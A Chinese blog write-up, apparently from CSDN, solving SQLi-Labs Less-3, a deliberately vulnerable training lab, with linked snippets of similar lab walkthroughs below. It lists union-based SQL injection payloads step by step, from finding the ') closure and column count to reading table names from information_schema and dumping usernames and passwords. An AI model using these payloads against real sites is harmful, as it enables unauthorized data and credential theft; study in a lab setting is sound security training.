SQL注入——初级SQli-Labs less 3

最新推荐文章于 2024-08-04 00:08:07 发布
最新推荐文章于 2024-08-04 00:08:07 发布
阅读量853 收藏 5
点赞数 3
文章标签: web安全 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Flamingo1998/article/details/125223162
版权

初级学习SQl注入

1.判断网页为动态还是静态

首先传递两个不同参数,网页显示不同,例如:?id=1 ,?id=2。显示不同为动态网页。

2.判断是否存在SQL注入漏洞

输入?id=1\ 可以看到报错有回显,提示语法错误

可以看到报错信息 "1\') 可以知道可以看出输入方式('id')方式构成闭合

输入?id=1') and 1 =1 -- - 利用布尔表达式结果为真输出数据

输入?id=1') and 1=2 -- - 结果为假没有数据输出

可以看出此处存在sql注入漏洞。

3.判断几位字段

一般采用二分法比较高效

首先输入?id=1')  order by 10 -- - 提示超出范围

二分法 输入?id=1')  order by 5 -- -如图

输入?id=1')  order by 3 -- - 如图出现数据

输入?id=1')  order by 4 -- - 如图

 经过以上判断可以看出显示字段3位。

4.判断那几位字段显示

输入语句?id=-1') union select 1,2,3 -- -    可以看到显示2,3,那么说明前端网页显示 2,3位字段

 5.获取当前库,当前库的所有表,表里的字段

输入?id=-1') union select 1,2,database() -- - 获取库

输入?id=-1') union select 1,database(),group_concat(distinct table_name) from information_schema.columns where table_schema=database() -- - 获取表名

 输入?id=-1') union select 1,database(),group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' -- - users表里的字段

 6.对信息获取

利用上面我们找到了库,表,字段,进行获取

输入?id=-1') union select 1,group_concat(username),group_concat(password) from users -- -

 

Flamingo弗
关注
SQL注入sqli第四关(less-4)
s_xcx_ah的博客
06-10 1412
SQLI第四关
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1309
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
初阶sql注入总结
weixin_30586257的博客
09-07 223
0x00 sql注入是通过用户输入构造语句以实现目的。一句话,不要相信任何用户输入的内容,做好防护。0x01 传参方式传参方式一般通过get方式,或者post方式提交,者的优点是效率高,后者的优点是安全性好、参数的长度长。在sql注入攻击中,通常会选择用户输入内容的地方进行攻击。除此之外,http header中也存在sql注入,比如referer,cookie等等。所以思路一定要开阔,凡是...
SQL注入实例(sqli-labs/less-3)
最新发布
Thewei666的博客
08-04 570
确定为字符型注入确定闭合字符为 ‘)
sql注入系列之Sqli-labs(less-3)
BetsyMyGirl的博客
12-02 4325
看完还不会Sql注入你来打我
sql注入less3
Mdcq123的博客
10-15 334
?id=1’) order by 3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,database(),3%23 http://192.168.197.146/sqli-labs/sqli-labs/Less-3/?id=-1’) union select 1,(select group_...
SQL注入sqlilabs:less-1
Dmajorcanon的博客
02-21 3759
sqlilabs个人练习及解题思路√
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1429
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当操作系统-看是否支持大小写或文件路径选择-
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
m0_73615178的博客
03-03 728
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当主机名称。
Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1891
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
SQL注入-入门需了解项目
m0_63241485的博客
08-19 237
结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986年10月,美国国家标准学会对SQL进行规范后,以此作为关系式数据库管理系统的标准语言(ANSI X3. 135-1986),1987年得到国际标准组织的支持下成为国际标准。不过各种通行的数据库系统在其实践过程中都对SQL规范作了某些编改和扩充。所以,实际上不同数据库系统之间的SQL不能完全相互通用。提示:以下是本篇文章正文内容,下面文章可供参考。
sql注入系列之Sqli-labs(less-4)
BetsyMyGirl的博客
12-06 871
看完不会来打我
SQL注入】Less-3错误型GET单引号变形字符型注入
Mitchell_Donovan的博客
03-30 370
Less-3错误型GET单引号变形字符型注入 什么是sql变形字符串注入?最常见的有: 1、将查询条件转为base64 2、本实验用)来实现变形; 3、宽字节字体编码利用,例如gbk中文字符,这种比较难用;例如试图用%df%5c%27试图在%df%5c%27为中文字符绕过%27PHP魔术引用的转义成\%27但也要取决于环境;故此宽字节去做sql注入的转义绕过很难。 实验漏洞复现介绍 该实验与Less-2错误型GET整型注入 区别在于,构建payload新增')单引号;)表示变形! 1、爆开数据库
sql-less4
weixin_51558394的博客
04-17 2591
首先判断是否存在注入点 ?id=1--+没有报错说明不是数字型报错 不是数字型就是就是字符型 老规矩进行1‘ 和 1” 的尝试 我们发现保持告诉我们应该注入何种类型 然后进行列表数目的猜测 ?id=1") order by 4--+ 然后利用漏洞点逐步进行爆表 ?id=-1")%20 union select 1,database(),vesion()--+ 发现数据库名security 和数据库版本 5.7.26 ?id=-1")%20 union selec
Web安全SQL注入(初级知识)
手写我对你的温柔
10-15 406
SQL注入SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手段 比如查询端向后台传送的url中: xxxxx?id=1 查询某个id为1的user,然后后台会返回json数据。 sql服务器对应执行的sql语句为: SELECT * FROM users WHERE id = 1 如果恶意构造输入参数: xxxxx?id=-1 OR ...
sqlilabs(SQL注入)小白通基础通关笔记(专针对小白)(第三关Less-3)
u013630181的博客
07-05 310
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=ut
php代码审计-sql注入初级
MSB_WLAQ的博客
10-14 296
概述 代码审计顾名思义就是检查源代码中的缺点和错误信息,分析并找到这些问题引发的安全漏洞,并提供代码修订措施和建议。这篇文章的目的是为了让小伙伴们对php代码审计有一个基本的了解,采用的代码都是自己写的仅仅能体现出漏洞所以会略显简洁。并且这次文章的主要内容为代码审计所以不会写太多的注入语句,更多的是对代码的分析,有兴趣的同学可以百度查查资料。 环境要求 phpstudy和一篇简单易懂的php源码 sql注入 SQL 注入(SQL Injection) 是发生在 Web 程序中数据库层的安全漏洞,是
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值